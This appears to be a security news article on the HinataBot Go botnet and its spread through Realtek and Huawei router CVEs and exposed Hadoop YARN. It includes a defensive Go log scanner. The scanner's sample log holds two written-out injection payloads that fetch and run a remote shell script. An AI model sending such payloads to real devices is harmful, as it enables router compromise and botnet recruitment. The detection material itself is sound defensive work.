In January, a Go-based botnet named HinataBot (after the character from the popular anime series Naruto) was discovered in HTTP and SSH honeypots, exploiting old vulnerabilities and weak credentials to spread.
HinataBot Overview
According to Akamai's SIRT team, the botnet exploited known arbitrary code execution flaws in the Realtek SDK miniigd SOAP service (CVE-2014-8361) and in Huawei HG532 routers (CVE-2017-17215) to spread. It also targeted exposed Hadoop YARN servers with weak credentials.
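Because all three spreading methods above go over HTTP, the requests show up clearly in HTTP honeypot or web-server logs. The following Go program is an added example (not Akamai's code and not HinataBot's) that scans a constructed JSON-lines honeypot log for the request shapes associated with the two CVEs and with YARN application submission. The request paths and body patterns follow the public descriptions of those vulnerabilities; the log field names, the sample records and the addresses in them are assumptions made for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Request is one HTTP request as a honeypot might record it, one JSON object
// per line. The field names are an assumption for this example.
type Request struct {
	Time   string `json:"ts"`
	Src    string `json:"src"`
	Method string `json:"method"`
	Path   string `json:"path"`
	Body   string `json:"body"`
}

// Signature is one request pattern associated with a known spreader.
// Body is optional; when set, it must match the request body.
type Signature struct {
	Name       string
	Method     string
	PathPrefix string
	Body       *regexp.Regexp
}

// Shell metacharacters inside the NewInternalClient element distinguish a
// CVE-2014-8361 injection from a legitimate UPnP AddPortMapping call.
var realtekInjection = regexp.MustCompile(`NewInternalClient>[^<]*[;|&$]`)

// Patterns follow the public descriptions of the CVEs named in the article;
// they are not taken from HinataBot itself.
var signatures = []Signature{
	{"CVE-2014-8361", "POST", "/picsdesc.xml", realtekInjection},
	{"CVE-2014-8361", "POST", "/wanipcn.xml", realtekInjection},
	// Huawei HG532 DeviceUpgrade: command substitution in NewStatusURL or
	// NewDownloadURL.
	{"CVE-2017-17215", "POST", "/ctrlt/DeviceUpgrade_1",
		regexp.MustCompile(`New(StatusURL|DownloadURL)>[^<]*\$\(`)},
	// Hadoop YARN ResourceManager REST API: an application submission from an
	// untrusted source on an internet-exposed cluster is suspicious by itself.
	{"Hadoop-YARN", "POST", "/ws/v1/cluster/apps", nil},
}

// Hit records one matched request.
type Hit struct {
	Src       string
	Signature string
	Path      string
}

// Classify returns the name of the first signature the request matches.
func Classify(r Request) (string, bool) {
	for _, s := range signatures {
		if r.Method != s.Method || !strings.HasPrefix(r.Path, s.PathPrefix) {
			continue
		}
		if s.Body != nil && !s.Body.MatchString(r.Body) {
			continue
		}
		return s.Name, true
	}
	return "", false
}

// ScanLog parses JSON-lines honeypot records and returns the matched ones.
func ScanLog(lines []string) ([]Hit, error) {
	var hits []Hit
	for i, ln := range lines {
		ln = strings.TrimSpace(ln)
		if ln == "" {
			continue
		}
		var r Request
		if err := json.Unmarshal([]byte(ln), &r); err != nil {
			return nil, fmt.Errorf("line %d: %w", i+1, err)
		}
		if name, ok := Classify(r); ok {
			hits = append(hits, Hit{Src: r.Src, Signature: name, Path: r.Path})
		}
	}
	return hits, nil
}

// SampleLog is constructed input using documentation addresses; it is not a
// real capture. Line 2 is a benign AddPortMapping and must not match.
const SampleLog = `
{"ts":"2023-03-16T10:00:01Z","src":"203.0.113.5","method":"POST","path":"/picsdesc.xml","body":"<NewInternalClient>/tmp;wget http://198.51.100.7/x.sh;sh x.sh</NewInternalClient>"}
{"ts":"2023-03-16T10:00:02Z","src":"192.0.2.44","method":"POST","path":"/picsdesc.xml","body":"<NewInternalClient>192.168.1.20</NewInternalClient>"}
{"ts":"2023-03-16T10:00:03Z","src":"203.0.113.9","method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<NewStatusURL>$(/bin/busybox wget -g 198.51.100.7 -l /tmp/a -r /a;sh /tmp/a)</NewStatusURL>"}
{"ts":"2023-03-16T10:00:04Z","src":"203.0.113.12","method":"POST","path":"/ws/v1/cluster/apps/new-application","body":""}
{"ts":"2023-03-16T10:00:05Z","src":"192.0.2.80","method":"GET","path":"/","body":""}
`

func main() {
	hits, err := ScanLog(strings.Split(SampleLog, "\n"))
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, h := range hits {
		fmt.Printf("%-14s %-16s %s\n", h.Signature, h.Src, h.Path)
	}
}
```

Run as-is it reports three hits (the Realtek injection, the Huawei injection and the YARN submission) and ignores the legitimate port-mapping request. Matching on shell metacharacters in the injected element, rather than on the SOAP endpoint alone, is what keeps the Realtek rule from alerting on every UPnP client on the network; the YARN rule is deliberately broader because a public cluster that accepts application submissions at all is the problem.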
During DDoS attacks, HinataBot can send flood traffic over HTTP, UDP, TCP, and ICMP. In the latest version, however, the authors have narrowed the attack methods to HTTP and UDP floods only.
Before building their own botnet in mid-January, HinataBot's operators distributed Mirai binaries.
According to researchers, the new botnet is a Golang version of Mirai that follows some of the latter’s attack methods and processes. The way HinataBot communicates and parses commands to launch attacks is one of these similarities.
HinataBot is still in development, so it is difficult to predict its future attack scope.
HinataBot joins the ever-growing list of Go-based threats, combining older, proven techniques such as Mirai's with a fresh implementation. Organizations are advised to update the firmware of affected products while researchers continue to monitor HinataBot. The published IOCs can also be used to gain a better understanding of the operators' current attack patterns.
The Rise of Go-based Botnets
Cybercriminals are increasingly interested in Golang because of its high performance, ease of multithreading, and cross-compilation capabilities. As recently as last week, the GoBruteforcer botnet was spotted scanning and infecting popular web servers to launch targeted attacks. It goes after web servers running phpMyAdmin, MySQL, FTP, and Postgres.
Another multi-purpose Go-based botnet known as Chaos became a matter of security concern as it expanded its cryptomining and DDoS attacks to target Windows and Linux devices across Europe.
In another instance, a new GoTrim botnet was spotted scanning for and brute-forcing websites running the WordPress CMS in order to launch DDoS attacks.